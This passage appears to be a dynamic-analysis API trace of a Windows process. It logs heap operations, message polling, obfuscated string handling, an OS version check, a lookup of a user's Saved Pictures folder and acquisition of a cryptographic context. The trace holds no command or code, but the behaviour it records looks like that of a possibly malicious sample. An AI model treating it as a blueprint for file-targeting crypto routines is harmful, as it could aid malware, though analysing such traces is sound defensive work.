Size=0x4) returned 0x2a719f8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.244] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Saved Pictures", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 0x9e1ab8 [0211.246] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0211.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.248] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.248] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.248] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.248] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.248] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.249] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.249] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.249] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.249] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.250] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.250] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.251] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.251] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.251] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.252] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c5d8) returned 1 [0211.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.252] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.252] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.252] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.252] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.252] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, 